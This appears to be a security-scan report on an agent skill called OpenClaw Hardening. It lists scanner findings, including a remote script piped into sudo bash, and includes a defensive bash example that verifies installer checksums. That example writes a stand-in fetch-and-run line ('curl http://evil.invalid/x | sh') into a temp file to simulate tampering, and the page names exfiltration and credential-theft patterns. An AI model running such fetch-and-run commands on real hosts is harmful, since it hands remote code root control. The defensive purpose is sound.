OpenClaw Hardening

Security checks across malware telemetry and agentic risk

Overview

This is a real hardening guide, but it asks users to run powerful root-level installers and persistent traffic-monitoring services with limited scoping and safety guidance.

Install only after reviewing the referenced scripts and binaries, pinning versions, and verifying checksums or signatures. Apply SSH and firewall changes from a console or recovery-capable session, confirm required ports first, and define log retention and permissions before enabling proxies, MCP file tools, eBPF observers, or cron jobs.
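The safer shape of the install step described above, as an added example that is not part of the scanned skill or of this report: fetch the installer to disk, verify it against a digest pinned from the project's release notes, review it, and re-verify immediately before handing it to sudo. This is the alternative to the `curl ... | sudo bash` pattern the high-severity finding below objects to. The URL, destination path and digest names are placeholders; the self-check at the end runs on a constructed local file and needs no network.

```bash
#!/bin/sh
# Added example, not the skill's own code. Replaces
#   curl -fsSL https://example.invalid/install.sh | sudo bash
# with fetch -> verify pinned digest -> review -> re-verify -> run.
# https://example.invalid and PINNED_SHA256 are placeholders.
set -eu

# verify_sha256 FILE EXPECTED_HEX
# Returns 0 when FILE hashes to EXPECTED_HEX, 1 otherwise (detail on stderr).
verify_sha256() {
  local file="$1" expected="$2" actual
  actual=$(sha256sum "$file" | cut -d' ' -f1)
  if [ "$actual" = "$expected" ]; then
    return 0
  fi
  printf 'checksum mismatch for %s\n  expected %s\n  got      %s\n' \
    "$file" "$expected" "$actual" >&2
  return 1
}

# fetch_pinned URL DEST EXPECTED_HEX
# Downloads to a temp file next to DEST, verifies, then moves it into place.
# Nothing is executed here; the operator reads DEST before running it.
fetch_pinned() {
  local url="$1" dest="$2" expected="$3" tmp
  tmp=$(mktemp "${dest}.XXXXXX")
  # Pin the transport as well: HTTPS only, no redirect to http://, TLS >= 1.2.
  if ! curl --fail --silent --show-error --location --proto '=https' \
            --proto-redir '=https' --tlsv1.2 --output "$tmp" "$url"; then
    rm -f "$tmp"; return 1
  fi
  if ! verify_sha256 "$tmp" "$expected"; then
    rm -f "$tmp"; return 1
  fi
  chmod 0644 "$tmp"
  mv "$tmp" "$dest"
  echo "saved $dest; review it before running" >&2
}

# run_verified FILE EXPECTED_HEX [INSTALLER ARGS...]
# Re-checks the digest right before execution: the file on disk at that
# moment, not the copy reviewed earlier, is what gets root.
run_verified() {
  local file="$1" expected="$2"
  shift 2
  verify_sha256 "$file" "$expected" || return 1
  sudo bash "$file" "$@"
}

# Intended use (commented out: needs network and root):
#   fetch_pinned https://example.invalid/install.sh ./install.sh "$PINNED_SHA256"
#   less ./install.sh
#   run_verified ./install.sh "$PINNED_SHA256" --prefix /opt/openclaw

# Offline self-check on a constructed file: the pinned digest is accepted,
# and the same file with a line appended after "review" is rejected.
demo_self_check() {
  local f digest
  f=$(mktemp)
  printf '#!/bin/sh\necho "installer ran"\n' > "$f"
  digest=$(sha256sum "$f" | cut -d' ' -f1)
  verify_sha256 "$f" "$digest" || { rm -f "$f"; return 1; }
  printf 'curl http://evil.invalid/x | sh\n' >> "$f"   # simulated tampering
  if verify_sha256 "$f" "$digest" 2>/dev/null; then rm -f "$f"; return 1; fi
  rm -f "$f"
  echo "self-check ok: pinned digest accepted, tampered copy rejected"
}

demo_self_check
```

The digest has to come from somewhere other than the same unauthenticated page that serves the script, or the check only proves the download was not corrupted in transit; a signed release note, tag, or checksum file verified with the project's key is the usual source. Pinning a version tag rather than a moving branch serves the same purpose for the URL itself.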

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • Privilege Escalation: Excessive Permissions, Sudo/Root Execution, Credential Access
  • Excessive Agency: Unrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • MCP Tool Poisoning: Hidden Instructions, Unicode Deception, Parameter Description Injection
  • Prompt Injection: Instruction Override, Hidden Instructions, Exfiltration Commands
Findings (5)

Description-Behavior Mismatch

Severity: Medium
Confidence: 90%
Finding:
The skill is advertised as a server-hardening/auditing guide, but it adds an unrelated persistent news-ingestion and digest workflow. That expands the system's attack surface, adds ongoing external connectivity and scheduled activity, and can mislead operators into deploying unnecessary components under the guise of security hardening.

Context-Inappropriate Capability

Severity: Medium
Confidence: 94%
Finding:
This section instructs the system to continuously fetch RSS/Reddit/HN content and process it on a schedule, which is not necessary to secure an OpenClaw server. Persistent external collection increases network exposure, introduces supply-chain/content trust risks, and creates new operational pathways that an attacker could abuse or that could fail noisily on a hardened host.

Missing User Warnings

Severity: Medium
Confidence: 91%
Finding:
The guide includes privileged, system-altering commands that modify SSH settings, firewall rules, package state, and filesystem permissions without prominent warnings about lockout or service impact. In a skill context, operators may execute these steps verbatim, risking denial of access or unintended configuration damage.

Missing User Warnings

Severity: High
Confidence: 99%
Finding:
The skill recommends piping a remote script directly into sudo bash, giving an unaudited network-delivered payload immediate root execution. If the upstream repository, transport, account, or referenced script is compromised, the host can be fully taken over.

Missing User Warnings

Severity: Medium
Confidence: 87%
Finding:
The skill directs users to route all LLM API traffic through an intercept proxy and upstream provider endpoints, but it does not clearly disclose what data may still be transmitted or logged. Users could wrongly assume this fully prevents provider exposure, leading to unsafe handling of sensitive prompts or metadata.

VirusTotal

65/65 vendors flagged this skill as clean.